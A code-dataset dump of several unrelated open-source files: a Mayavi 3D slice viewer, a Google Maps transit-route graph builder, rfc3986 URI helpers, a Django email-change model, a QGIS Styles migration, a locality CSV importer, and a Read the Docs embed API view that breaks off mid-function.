color_tuple[2]/255.)
)
except:
pts = mlab.points3d(
self.sphere_coords[:,0],
self.sphere_coords[:,1],
self.sphere_coords[:,2],
mode='cube',
scale_factor=1,
figure = self.scene3d.mayavi_scene,
color = (1.,0.,0.)
)
return pts
def _sphere_coords_default(self):
return np.array(sphere_around_ijk(
self.radius, np.array([self.x, self.y, self.z])))
def _sphere_visible_changed(self):
self.sphere_viz.visible = self.sphere_visible
def _sphere_color_changed(self):
print "changing sphere color to", self.sphere_color
# different between wx and qt
try:
color_tuple = self.sphere_color.toTuple()
except:
color_tuple = self.sphere_color
self.sphere_viz.actor.property.color = (
color_tuple[0]/255.,
color_tuple[1]/255.,
color_tuple[2]/255.)
def make_x_slice_plane(self):
ipw = mlab.pipeline.image_plane_widget(
self.data_src,
figure=self.scene3d.mayavi_scene,
plane_orientation='x_axes',
name='Cut x',colormap="gray"
)
ipw.ipw.slice_position=self.x
ipw.ipw.interaction = 0
return ipw
def make_y_slice_plane(self):
ipw = mlab.pipeline.image_plane_widget(
self.data_src, colormap='gray',
figure=self.scene3d.mayavi_scene,
plane_orientation='y_axes',
name='Cut y')
ipw.ipw.slice_position=self.y
ipw.ipw.interaction = 0
return ipw
def make_z_slice_plane(self):
ipw = mlab.pipeline.image_plane_widget(
self.data_src,colormap='gray',
figure=self.scene3d.mayavi_scene,
plane_orientation='z_axes',
name='Cut z')
ipw.ipw.slice_position=self.z
ipw.ipw.interaction = 0
return ipw
@on_trait_change('sphere_x,sphere_y,sphere_z,radius')
def _update_sphere(self):
self.disable_render = True
self.sphere_coords = np.array(sphere_around_ijk(
self.radius, np.array([self.sphere_x,
self.sphere_y,
self.sphere_z])))
self.sphere_viz.mlab_source.reset(
x=self.sphere_coords[:,0],
y=self.sphere_coords[:,1],
z=self.sphere_coords[:,2],
)
self.disable_render = False
self.coordsupdated += 1
def arbitrary_voxel_query(self,new_indices):
self.disable_render = True
self.sphere_coords = np.array(new_indices)
self.sphere_viz.mlab_source.reset(
x=self.sphere_coords[:,0],
y=self.sphere_coords[:,1],
z=self.sphere_coords[:,2],
)
self.disable_render = False
self.coordsupdated += 1
@on_trait_change('scene3d.activated')
def display_scene3d(self):
if self.scene3d_inited: return
self.scene3d.mlab.view(40, 50)
self.scene3d.scene.background = (0, 0, 0)
# Keep the view always pointing up
self.scene3d.scene.interactor.interactor_style = \
tvtk.InteractorStyleTerrain()
#self.scene3d.mayavi_scene.scene.light_manager.light_mode = "vtk"
self.scene3d_inited = True
@on_trait_change('x_slice_plane_visible,y_slice_plane_visible,z_slice_plane_visible')
def update_slice_opacity(self,obj,name,old,new):
if name=='x_slice_plane_visible':
self.x_slice_plane.ipw.texture_visibility = new
if name=="y_slice_plane_visible":
self.y_slice_plane.ipw.texture_visibility = new
if name=="z_slice_plane_visible":
self.z_slice_plane.ipw.texture_visibility = new
sphere_widgets = VGroup(
Item(name="sphere_x",
editor=RangeEditor(
auto_set=False,
mode="slider",
low=0,
high_name="extent_x",
format = "%i")),
Item(name="sphere_y",
editor=RangeEditor(
auto_set=False,
mode="slider",
low=0,
high_name='extent_y',
format = "%i")),
Item(name="sphere_z",
editor=RangeEditor(
auto_set=False,
mode="slider",
low=0,
high_name='extent_z',
format = "%i")),
Item(name="radius"),
Item(name="sphere_color"),
Item(name="sphere_visible"),
label="Search Sphere",
show_border=True
)
plot3d_group = Group(
Item('scene3d',
editor=SceneEditor(scene_class=Scene),
height=500, width=500),
show_labels=False)
slice_panel_group = HGroup(sphere_widgets,
Item('slice_plots',style="custom"),
show_labels=False)
# ----- Views -----
browser_view = View(
VSplit(
plot3d_group,
slice_panel_group
)
)
traits_view = View(
slice_panel_group
) | gpl-3.0 | -7,945,498,863,849,230,000 | 33.699681 | 89 | 0.550829 | false |
achak1987/greenroute | src/google.py | 1 | 8516 | '''
@author: Antorweep Chakravorty
'''
import googlemaps
import rapidjson as json
import pickle
import pprint
from datetime import datetime
from vertex import vertex
from edge import edge
class GoogleMapsAPI(object):
def __init__(self, username, password, app_id, app_token):
self.username = username
self.password = password
self.app_id = app_id
self.api_token = app_token
self.gmaps = googlemaps.Client(key=self.api_token)
@classmethod
def from_credentials_file(self, file_name):
f = open(file_name)
credentials = json.loads(f.read())["google"]
args = tuple(credentials[key] for key in ('username','password', 'app_id' ,'api_token'))
return GoogleMapsAPI(*args)
def decode_line(self, encoded):
"""Decodes a polyline that was encoded using the Google Maps method.
See http://code.google.com/apis/maps/documentation/polylinealgorithm.html
This is a straightforward Python port of Mark McClure's JavaScript polyline decoder
(http://facstaff.unca.edu/mcmcclur/GoogleMaps/EncodePolyline/decode.js)
and Peter Chng's PHP polyline decode
(http://unitstep.net/blog/2008/08/02/decoding-google-maps-encoded-polylines-using-php/)
"""
encoded_len = len(encoded)
index = 0
array = []
lat = 0
lng = 0
while index < encoded_len:
b = 0
shift = 0
result = 0
while True:
b = ord(encoded[index]) - 63
index = index + 1
result |= (b & 0x1f) << shift
shift += 5
if b < 0x20:
break
dlat = ~(result >> 1) if result & 1 else result >> 1
lat += dlat
shift = 0
result = 0
while True:
b = ord(encoded[index]) - 63
index = index + 1
result |= (b & 0x1f) << shift
shift += 5
if b < 0x20:
break
dlng = ~(result >> 1) if result & 1 else result >> 1
lng += dlng
array.append((lat * 1e-5, lng * 1e-5))
return array
def getGeoCode(self, address):
coordinates = self.gmaps.geocode(address)[0]['geometry']['location']
return str(coordinates["lat"]) + "," + str(coordinates["lng"])
def getAddress(self, longitude, latitude):
return self.gmaps.reverse_geocode((latitude, longitude))
def getRoutes(self, origin, destination, departBy, alternatives):
#Store all routes returned by GoogleMap API
graphs = []
directions_result = self.gmaps.directions(origin,
destination,
mode="transit",
departure_time=departBy,
alternatives=alternatives)
#print(json.dumps(directions_result, indent=2))
#itterate through each route
for d in directions_result:
#describes the legs of the journey.
#For routes that contain no waypoints, the route will consist of a single "leg,"
#but for routes that define one or more waypoints,
#the route will consist of one or more legs
legs = d["legs"]
#Store the vertexes
vertices = []
#Store the edges
edges = []
for l in legs:
#Contains san array of steps denoting information about each seperate step of the leg
steps = l["steps"]
for s in steps:
travel_mode = s["travel_mode"]
html_instructions = s["html_instructions"]
if travel_mode == "WALKING":
walking_steps = s["steps"]
for ws in walking_steps:
start_location = ws["start_location"]
end_location = ws["end_location"]
html_instructions = (ws["html_instructions"] if "html_instructions" in ws else "")
distance = ws["distance"]["value"]
duration = ws["duration"]["value"]
start_lat = start_location["lat"]
start_lng = start_location["lng"]
start_vertex_id = hash(str(start_lat)+str(start_lng))
end_lat = end_location["lat"]
end_lng = end_location["lng"]
end_vertex_id = hash(str(end_lat)+str(end_lng))
start_vertex = vertex(start_vertex_id, start_lat, start_lng, "false")
end_vertex = vertex(end_vertex_id, end_lat, end_lng, "false")
connection = edge(start_vertex_id, end_vertex_id, travel_mode,
distance, duration)
vertices.append(start_vertex.getVertex())
vertices.append(end_vertex.getVertex())
edges.append(connection.getEdge())
elif travel_mode == "TRANSIT":
transit_details = s["transit_details"]
headsign = transit_details["headsign"]
departure_stop = transit_details["departure_stop"]
arrival_stop = transit_details["arrival_stop"]
departure_time = transit_details["departure_time"]
arrival_time = transit_details["arrival_time"]
num_stops = transit_details["num_stops"]
short_name = transit_details["line"]
start_location = s["start_location"]
end_location = s["end_location"]
stops_coordinates = self.decode_line(s["polyline"]["points"])
start_lat = start_location["lat"]
start_lng = start_location["lng"]
start_vertex_id = hash(str(start_lat)+str(start_lng))
end_lat = end_location["lat"]
end_lng = end_location["lng"]
end_vertex_id = hash(str(end_lat)+str(end_lng))
start_vertex = vertex(start_vertex_id, start_lat, start_lng, "true")
end_vertex = vertex(end_vertex_id, end_lat, end_lng, "true")
distance = s["distance"]["value"]/num_stops
duration = s["duration"]["value"]/num_stops
vertices.append(start_vertex.getVertex())
vertices.append(end_vertex.getVertex())
prev_vertex_id = start_vertex_id
for stop in stops_coordinates:
lat = stop[0]
lng = stop[1]
vertex_id = hash(str(lat)+str(lng))
stop_vertex = vertex(vertex_id, lat, lng, "true")
connection = edge(prev_vertex_id, vertex_id, travel_mode,
distance, duration)
prev_vertex_id = vertex_id
vertices.append(stop_vertex.getVertex())
edges.append(connection.getEdge())
connection = edge(prev_vertex_id, end_vertex, travel_mode,
distance, duration)
edges.append(connection.getEdge())
#TODO: DRIVING
graphs.append((vertices, edges))
return graphs
#if __name__ == "__main__":
#main()
api = GoogleMapsAPI.from_credentials_file('credentials.json')
# Geocoding an address
origin = api.getGeoCode('Randaberg')
destination = api.getGeoCode('Kjell Arholmsgate 41, 4036 Stavanger, NO')
now = datetime.now()
#depart = datetime(2016, 11, 22, 12, 0, 0)
routes = api.getRoutes(origin, destination, now, "false")
with open("graphs.out", 'wb') as f:
pickle.dump(routes, f)
| mit | -5,904,404,823,734,875,000 | 39.746411 | 136 | 0.486731 | false |
liszd/whyliam.workflows.youdao | urllib3/packages/rfc3986/_mixin.py | 1 | 13255 | """Module containing the implementation of the URIMixin class."""
import warnings
from . import exceptions as exc
from . import misc
from . import normalizers
from . import validators
class URIMixin(object):
"""Mixin with all shared methods for URIs and IRIs."""
__hash__ = tuple.__hash__
def authority_info(self):
"""Return a dictionary with the ``userinfo``, ``host``, and ``port``.
If the authority is not valid, it will raise a
:class:`~rfc3986.exceptions.InvalidAuthority` Exception.
:returns:
``{'userinfo': 'username:password', 'host': 'www.example.com',
'port': '80'}``
:rtype: dict
:raises rfc3986.exceptions.InvalidAuthority:
If the authority is not ``None`` and can not be parsed.
"""
if not self.authority:
return {"userinfo": None, "host": None, "port": None}
match = self._match_subauthority()
if match is None:
# In this case, we have an authority that was parsed from the URI
# Reference, but it cannot be further parsed by our
# misc.SUBAUTHORITY_MATCHER. In this case it must not be a valid
# authority.
raise exc.InvalidAuthority(self.authority.encode(self.encoding))
# We had a match, now let's ensure that it is actually a valid host
# address if it is IPv4
matches = match.groupdict()
host = matches.get("host")
if (
host
and misc.IPv4_MATCHER.match(host)
and not validators.valid_ipv4_host_address(host)
):
# If we have a host, it appears to be IPv4 and it does not have
# valid bytes, it is an InvalidAuthority.
raise exc.InvalidAuthority(self.authority.encode(self.encoding))
return matches
def _match_subauthority(self):
return misc.SUBAUTHORITY_MATCHER.match(self.authority)
@property
def host(self):
"""If present, a string representing the host."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["host"]
@property
def port(self):
"""If present, the port extracted from the authority."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["port"]
@property
def userinfo(self):
"""If present, the userinfo extracted from the authority."""
try:
authority = self.authority_info()
except exc.InvalidAuthority:
return None
return authority["userinfo"]
def is_absolute(self):
"""Determine if this URI Reference is an absolute URI.
See http://tools.ietf.org/html/rfc3986#section-4.3 for explanation.
:returns: ``True`` if it is an absolute URI, ``False`` otherwise.
:rtype: bool
"""
return bool(misc.ABSOLUTE_URI_MATCHER.match(self.unsplit()))
def is_valid(self, **kwargs):
"""Determine if the URI is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param bool require_scheme: Set to ``True`` if you wish to require the
presence of the scheme component.
:param bool require_authority: Set to ``True`` if you wish to require
the presence of the authority component.
:param bool require_path: Set to ``True`` if you wish to require the
presence of the path component.
:param bool require_query: Set to ``True`` if you wish to require the
presence of the query component.
:param bool require_fragment: Set to ``True`` if you wish to require
the presence of the fragment component.
:returns: ``True`` if the URI is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
validators = [
(self.scheme_is_valid, kwargs.get("require_scheme", False)),
(self.authority_is_valid, kwargs.get("require_authority", False)),
(self.path_is_valid, kwargs.get("require_path", False)),
(self.query_is_valid, kwargs.get("require_query", False)),
(self.fragment_is_valid, kwargs.get("require_fragment", False)),
]
return all(v(r) for v, r in validators)
def authority_is_valid(self, require=False):
"""Determine if the authority component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param bool require:
Set to ``True`` to require the presence of this component.
:returns:
``True`` if the authority is valid. ``False`` otherwise.
:rtype:
bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
try:
self.authority_info()
except exc.InvalidAuthority:
return False
return validators.authority_is_valid(
self.authority, host=self.host, require=require
)
def scheme_is_valid(self, require=False):
"""Determine if the scheme component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the scheme is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.scheme_is_valid(self.scheme, require)
def path_is_valid(self, require=False):
"""Determine if the path component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the path is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.path_is_valid(self.path, require)
def query_is_valid(self, require=False):
"""Determine if the query component is valid.
.. deprecated:: 1.1.0
Use the :class:`~rfc3986.validators.Validator` object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the query is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.query_is_valid(self.query, require)
def fragment_is_valid(self, require=False):
"""Determine if the fragment component is valid.
.. deprecated:: 1.1.0
Use the Validator object instead.
:param str require: Set to ``True`` to require the presence of this
component.
:returns: ``True`` if the fragment is valid. ``False`` otherwise.
:rtype: bool
"""
warnings.warn(
"Please use rfc3986.validators.Validator instead. "
"This method will be eventually removed.",
DeprecationWarning,
)
return validators.fragment_is_valid(self.fragment, require)
def normalized_equality(self, other_ref):
"""Compare this URIReference to another URIReference.
:param URIReference other_ref: (required), The reference with which
we're comparing.
:returns: ``True`` if the references are equal, ``False`` otherwise.
:rtype: bool
"""
return tuple(self.normalize()) == tuple(other_ref.normalize())
def resolve_with(self, base_uri, strict=False):
"""Use an absolute URI Reference to resolve this relative reference.
Assuming this is a relative reference that you would like to resolve,
use the provided base URI to resolve it.
See http://tools.ietf.org/html/rfc3986#section-5 for more information.
:param base_uri: Either a string or URIReference. It must be an
absolute URI or it will raise an exception.
:returns: A new URIReference which is the result of resolving this
reference using ``base_uri``.
:rtype: :class:`URIReference`
:raises rfc3986.exceptions.ResolutionError:
If the ``base_uri`` is not an absolute URI.
"""
if not isinstance(base_uri, URIMixin):
base_uri = type(self).from_string(base_uri)
if not base_uri.is_absolute():
raise exc.ResolutionError(base_uri)
# This is optional per
# http://tools.ietf.org/html/rfc3986#section-5.2.1
base_uri = base_uri.normalize()
# The reference we're resolving
resolving = self
if not strict and resolving.scheme == base_uri.scheme:
resolving = resolving.copy_with(scheme=None)
# http://tools.ietf.org/html/rfc3986#page-32
if resolving.scheme is not None:
target = resolving.copy_with(
path=normalizers.normalize_path(resolving.path)
)
else:
if resolving.authority is not None:
target = resolving.copy_with(
scheme=base_uri.scheme,
path=normalizers.normalize_path(resolving.path),
)
else:
if resolving.path is None:
if resolving.query is not None:
query = resolving.query
else:
query = base_uri.query
target = resolving.copy_with(
scheme=base_uri.scheme,
authority=base_uri.authority,
path=base_uri.path,
query=query,
)
else:
if resolving.path.startswith("/"):
path = normalizers.normalize_path(resolving.path)
else:
path = normalizers.normalize_path(
misc.merge_paths(base_uri, resolving.path)
)
target = resolving.copy_with(
scheme=base_uri.scheme,
authority=base_uri.authority,
path=path,
query=resolving.query,
)
return target
def unsplit(self):
"""Create a URI string from the components.
:returns: The URI Reference reconstituted as a string.
:rtype: str
"""
# See http://tools.ietf.org/html/rfc3986#section-5.3
result_list = []
if self.scheme:
result_list.extend([self.scheme, ":"])
if self.authority:
result_list.extend(["//", self.authority])
if self.path:
result_list.append(self.path)
if self.query is not None:
result_list.extend(["?", self.query])
if self.fragment is not None:
result_list.extend(["#", self.fragment])
return "".join(result_list)
def copy_with(
self,
scheme=misc.UseExisting,
authority=misc.UseExisting,
path=misc.UseExisting,
query=misc.UseExisting,
fragment=misc.UseExisting,
):
"""Create a copy of this reference with the new components.
:param str scheme:
(optional) The scheme to use for the new reference.
:param str authority:
(optional) The authority to use for the new reference.
:param str path:
(optional) The path to use for the new reference.
:param str query:
(optional) The query to use for the new reference.
:param str fragment:
(optional) The fragment to use for the new reference.
:returns:
New URIReference with provided components.
:rtype:
URIReference
"""
attributes = {
"scheme": scheme,
"authority": authority,
"path": path,
"query": query,
"fragment": fragment,
}
for key, value in list(attributes.items()):
if value is misc.UseExisting:
del attributes[key]
uri = self._replace(**attributes)
uri.encoding = self.encoding
return uri
| mit | 3,825,426,568,369,881,600 | 34.727763 | 78 | 0.572312 | false |
tarak/django-change-email | change_email/models.py | 1 | 7639 | from datetime import timedelta
from django.contrib.sites.models import RequestSite
from django.contrib.sites.models import Site
from django.core.mail import EmailMultiAlternatives
from django.core.mail import send_mail
from django.core.urlresolvers import reverse
from django.db import models
from django.template.loader import render_to_string
from django.utils.translation import ugettext_lazy as _
from django.utils import timezone
from django.core.signing import Signer
from django.core.signing import BadSignature
from change_email.conf import settings
from change_email.managers import ExpiredEmailChangeManager
from change_email.managers import PendingEmailChangeManager
class EmailChange(models.Model):
"""
A model to temporarily store an email adress change request.
"""
new_email = models.EmailField(help_text=_('The new email address that'
' still needs to be confirmed.'),
verbose_name=_('new email address'),)
date = models.DateTimeField(auto_now_add=True,
help_text=_('The date and time the email '
'address change was requested.'),
verbose_name=_('date'),)
user = models.OneToOneField(settings.AUTH_USER_MODEL,
help_text=_('The user that has requested the'
' email address change.'),
verbose_name=_('user'),)
site = models.ForeignKey(Site, blank=True, null=True)
objects = models.Manager()
expired_objects = ExpiredEmailChangeManager()
pending_objects = PendingEmailChangeManager()
class Meta:
verbose_name = _('email address change request')
verbose_name_plural = _('email address change requests')
get_latest_by = "date"
def __unicode__(self):
return "%s" % self.user
def get_absolute_url(self):
return reverse('change_email_detail', kwargs={'pk': self.pk})
def has_expired(self, seconds=None):
"""
Checks whether this request has already expired.
:kwarg int seconds: The number of seconds to calculate a
:py:class:`datetime.timedelta` object.
Defaults to :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TIMEOUT`.
:returns: ``True`` if the request has already expired,
``False`` otherwise.
:rtype: bool
"""
if not seconds:
seconds = settings.EMAIL_CHANGE_TIMEOUT
delta = timedelta(seconds=seconds)
expiration_date = timezone.now() - delta
return expiration_date >= self.date
def check_signature(self, signature):
"""
Checks if
- the signature has not expired by calling :func:`has_expired`.
- the signature has not been tampered with by
calling :func:`verify_signature`.
:arg str signature: The signature to check, as generated
by :func:`make_signature`.
:returns: ``True`` if the check was successfully completed,
``False`` otherwise.
:rtype: bool
"""
if not self.has_expired():
return self.verify_signature(signature)
return False
def get_expiration_date(self, seconds=None):
"""
Returns the expiration date of an :model:`EmailChange` object by adding
a given amount of seconds to it.
:kwarg int seconds: The number of seconds to calculate a
:py:class:`datetime.timedelta` object.
Defaults to :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TIMEOUT`.
:returns: A :py:class:`datetime` object representing the expiration
date.
:rtype: :py:obj:`.datetime`
"""
if not seconds:
seconds = settings.EMAIL_CHANGE_TIMEOUT
delta = timedelta(seconds=seconds)
return self.date + delta
def make_signature(self):
"""
Generates a signature to use in one-time secret URL's
to confirm the email address change request.
:returns: A signature.
:rtype: str
"""
signer = Signer()
value = signer.sign(self.new_email)
email, signature = value.split(':', 1)
return signature
def send_confirmation_mail(self, request):
"""
An instance method to send a confirmation mail to the new
email address.
The generation of a confirmation email will use three templates that
can be set in each project's settings:
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_HTML_EMAIL_TEMPLATE`.
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_SUBJECT_EMAIL_TEMPLATE`
* :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_TXT_EMAIL_TEMPLATE`
These templates will receive the following context variables:
``date``
The date when the email address change was requested.
``timeout_date``
The date whe the request will expire.
``current_site``
An object representing the current site on which the user
is logged in. Depending on whether ``django.contrib.sites``
is installed, this may be an instance of either
``django.contrib.sites.models.Site`` (if the sites
application is installed) or
``django.contrib.sites.models.RequestSite`` (if
not). Consult the documentation for the Django sites
framework for details regarding these objects' interfaces.
``new_email``
The new email address.
``protocol``
The protocol used to generate the confirmation URL, either HTTP or HTTPS.
To use HTTPS set :py:attr:`~password_policies.conf.Settings.EMAIL_CHANGE_USE_HTTPS`
to True.
``signature``
The confirmation signature for the new email address.
``user``
The user that has requested the email address change.
:arg obj request: The request object.
"""
if Site._meta.installed:
current_site = Site.objects.get_current()
else:
current_site = RequestSite(request)
subject = settings.EMAIL_CHANGE_SUBJECT_EMAIL_TEMPLATE
body_htm = settings.EMAIL_CHANGE_HTML_EMAIL_TEMPLATE
body_txt = settings.EMAIL_CHANGE_TXT_EMAIL_TEMPLATE
context = {'current_site': current_site,
'date': self.date,
'timeout_date': self.get_expiration_date(),
'new_email': self.new_email,
'protocol': settings.EMAIL_CHANGE_USE_HTTPS and 'https' or 'http',
'signature': self.make_signature(),
'user': self.user}
subject = render_to_string(subject, context)
# Email subject *must not* contain newlines
subject = ''.join(subject.splitlines())
text_message = render_to_string(body_txt, context)
if settings.EMAIL_CHANGE_HTML_EMAIL:
html_message = render_to_string(body_htm, context)
msg = EmailMultiAlternatives(subject, text_message,
settings.EMAIL_CHANGE_FROM_EMAIL,
[self.new_email])
msg.attach_alternative(html_message, "text/html")
msg.send()
else:
send_mail(subject, text_message,
settings.EMAIL_CHANGE_FROM_EMAIL,
[self.new_email])
def verify_signature(self, signature):
"""
Checks if the signature has been tampered with.
:arg str signature: The signature to check, as generated by
:func:`make_signature`.
:returns: ``True`` if the signature has not been tampered with,
``False`` otherwise.
:rtype: bool
"""
signer = Signer()
value = "%s:%s" % (self.new_email, signature)
try:
signer.unsign(value)
except BadSignature:
return False
return True
| bsd-3-clause | 3,157,295,114,515,443,000 | 35.37619 | 87 | 0.645765 | false |
qgis/QGIS-Django | qgis-app/styles/migrations/0008_auto_20201215_2124.py | 1 | 2000 | # Generated by Django 2.2.13 on 2020-12-15 21:24
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('styles', '0007_auto_20201109_0112'),
]
operations = [
migrations.AlterField(
model_name='style',
name='approved',
field=models.BooleanField(db_index=True, default=False, help_text='Set to True if you wish to approve this resource.', verbose_name='Approved'),
),
migrations.AlterField(
model_name='style',
name='creator',
field=models.ForeignKey(help_text='The user who uploaded this resource.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Created by'),
),
migrations.AlterField(
model_name='style',
name='download_count',
field=models.IntegerField(default=0, editable=False, help_text='The number of times this resource has been downloaded. This is updated automatically.', verbose_name='Downloads'),
),
migrations.AlterField(
model_name='style',
name='require_action',
field=models.BooleanField(db_index=True, default=False, help_text='Set to True if you require creator to update the resource.', verbose_name='Requires Action'),
),
migrations.AlterField(
model_name='stylereview',
name='review_date',
field=models.DateTimeField(auto_now_add=True, help_text='The review date. Automatically added on review resource.', verbose_name='Reviewed on'),
),
migrations.AlterField(
model_name='stylereview',
name='reviewer',
field=models.ForeignKey(help_text='The user who reviewed this GeoPackage.', on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Reviewed by'),
),
]
| gpl-2.0 | -8,970,080,980,762,410,000 | 43.444444 | 190 | 0.6405 | false |
alexhayes/django-geopostcodes | django_geopostcodes/helpers.py | 1 | 1155 | # -*- coding: utf-8 -*-
"""
django_geopostcodes.helpers
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Helper functions for django-geopostcodes.
"""
from __future__ import absolute_import, print_function, unicode_literals
import csv
from django.contrib.gis.geos import Point
from django.db.transaction import atomic
from .models import Locality
def import_localities(path, delimiter=';'):
"""
Import localities from a CSV file.
:param path: Path to the CSV file containing the localities.
"""
creates = []
updates = []
with open(path, mode="r") as infile:
reader = csv.DictReader(infile, delimiter=str(delimiter))
with atomic():
for row in reader:
row['point'] = Point(float(row['longitude']),
float(row['latitude']))
locality, created = Locality.objects.update_or_create(
id=row['id'],
defaults=row
)
if created:
creates.append(locality)
else:
updates.append(locality)
return creates, updates
| mit | 4,832,721,024,787,421,000 | 25.25 | 72 | 0.547186 | false |
rtfd/readthedocs.org | readthedocs/embed/views.py | 1 | 13361 | """Views for the embed app."""
import functools
import json
import logging
import re
from urllib.parse import urlparse
from django.shortcuts import get_object_or_404
from django.template.defaultfilters import slugify
from django.utils.functional import cached_property
from docutils.nodes import make_id
from pyquery import PyQuery as PQ # noqa
from rest_framework import status
from rest_framework.renderers import BrowsableAPIRenderer, JSONRenderer
from rest_framework.response import Response
from rest_framework.views import APIView
from readthedocs.api.v2.mixins import CachedResponseMixin
from readthedocs.api.v2.permissions import IsAuthorizedToViewVersion
from readthedocs.builds.constants import EXTERNAL
from readthedocs.core.resolver import resolve
from readthedocs.core.unresolver import unresolve
from readthedocs.core.utils.extend import SettingsOverrideObject
from readthedocs.embed.utils import recurse_while_none
from readthedocs.projects.models import Project
from readthedocs.storage import build_media_storage
log = logging.getLogger(__name__)
def escape_selector(selector):
"""Escape special characters from the section id."""
regex = re.compile(r'(!|"|#|\$|%|\'|\(|\)|\*|\+|\,|\.|\/|\:|\;|\?|@)')
ret = re.sub(regex, r'\\\1', selector)
return ret
def clean_links(obj, url):
"""
Rewrite (internal) links to make them absolute.
1. external links are not changed
2. prepend URL to links that are just fragments (e.g. #section)
3. prepend URL (without filename) to internal relative links
"""
if url is None:
return obj
for link in obj.find('a'):
base_url = urlparse(url)
# We need to make all internal links, to be absolute
href = link.attrib['href']
parsed_href = urlparse(href)
if parsed_href.scheme or parsed_href.path.startswith('/'):
# don't change external links
continue
if not parsed_href.path and parsed_href.fragment:
# href="#section-link"
new_href = base_url.geturl() + href
link.attrib['href'] = new_href
continue
if not base_url.path.endswith('/'):
# internal relative link
# href="../../another.html" and ``base_url`` is not HTMLDir
# (e.g. /en/latest/deep/internal/section/page.html)
# we want to remove the trailing filename (page.html) and use the rest as base URL
# The resulting absolute link should be
# https://slug.readthedocs.io/en/latest/deep/internal/section/../../another.html
# remove the filename (page.html) from the original document URL (base_url) and,
path, _ = base_url.path.rsplit('/', 1)
# append the value of href (../../another.html) to the base URL.
base_url = base_url._replace(path=path + '/')
new_href = base_url.geturl() + href
link.attrib['href'] = new_href
return obj
class EmbedAPIBase(CachedResponseMixin, APIView):
# pylint: disable=line-too-long
"""
Embed a section of content from any Read the Docs page.
Returns headers and content that matches the queried section.
### Arguments
We support two different ways to query the API:
* project (required)
* version (required)
* doc or path (required)
* section
or:
* url (with fragment) (required)
### Example
- GET https://readthedocs.org/api/v2/embed/?project=requestsF&version=latest&doc=index§ion=User%20Guide&path=/index.html
- GET https://readthedocs.org/api/v2/embed/?url=https://docs.readthedocs.io/en/latest/features.html%23github-bitbucket-and-gitlab-integration
# Current Request
""" # noqa
permission_classes = [IsAuthorizedToViewVersion]
renderer_classes = [JSONRenderer, BrowsableAPIRenderer]
@functools.lru_cache(maxsize=1)
def _get_project(self):
if self.unresolved_url:
project_slug = self.unresolved_url.project.slug
else:
project_slug = self.request.GET.get('project')
return get_object_or_404(Project, slug=project_slug)
@functools.lru_cache(maxsize=1)
def _get_version(self):
if self.unresolved_url:
version_slug = self.unresolved_url.version_slug
else:
version_slug = self.request.GET.get('version', 'latest')
project = self._get_project()
return get_object_or_404(project.versions.all(), slug=version_slug)
@cached_property
def unresolved_url(self):
url = self.request.GET.get('url')
if not url:
return None
return unresolve(url)
def get(self, request):
"""Handle the get request."""
project = self._get_project()
version = self._get_version()
url = request.GET.get('url')
path = request.GET.get('path', '')
doc = request.GET.get('doc')
section = request.GET.get('section')
if url:
unresolved = self.unresolved_url
path = unresolved.filename
section = unresolved.fragment
elif not path and not doc:
return Response(
{
'error': (
'Invalid Arguments. '
'Please provide "url" or "section" and "path" GET arguments.'
)
},
status=status.HTTP_400_BAD_REQUEST
)
# Generate the docname from path
# by removing the ``.html`` extension and trailing ``/``.
if path:
doc = re.sub(r'(.+)\.html$', r'\1', path.strip('/'))
response = do_embed(
project=project,
version=version,
doc=doc,
section=section,
path=path,
url=url,
)
if not response:
return Response(
{
'error': (
"Can't find content for section: "
f"doc={doc} path={path} section={section}"
)
},
status=status.HTTP_404_NOT_FOUND
)
return Response(response)
class EmbedAPI(SettingsOverrideObject):
_default_class = EmbedAPIBase
def do_embed(*, project, version, doc=None, path=None, section=None, url=None):
"""Get the embed reponse from a document section."""
if not url:
external = version.type == EXTERNAL
url = resolve(
project=project,
version_slug=version.slug,
filename=path or doc,
external=external,
)
content = None
headers = None
if version.is_sphinx_type:
file_content = _get_doc_content(
project=project,
version=version,
doc=doc,
)
if not file_content:
return None
content, headers, section = parse_sphinx(
content=file_content,
section=section,
url=url,
)
else:
# TODO: this should read from the html file itself,
# we don't have fjson files for mkdocs.
file_content = _get_doc_content(
project=project,
version=version,
doc=doc,
)
content, headers, section = parse_mkdocs(
content=file_content,
section=section,
url=url,
)
if content is None:
return None
return {
'content': content,
'headers': headers,
'url': url,
'meta': {
'project': project.slug,
'version': version.slug,
'doc': doc,
'section': section,
},
}
def _get_doc_content(project, version, doc):
storage_path = project.get_storage_path(
'json',
version_slug=version.slug,
include_file=False,
version_type=version.type,
)
file_path = build_media_storage.join(
storage_path,
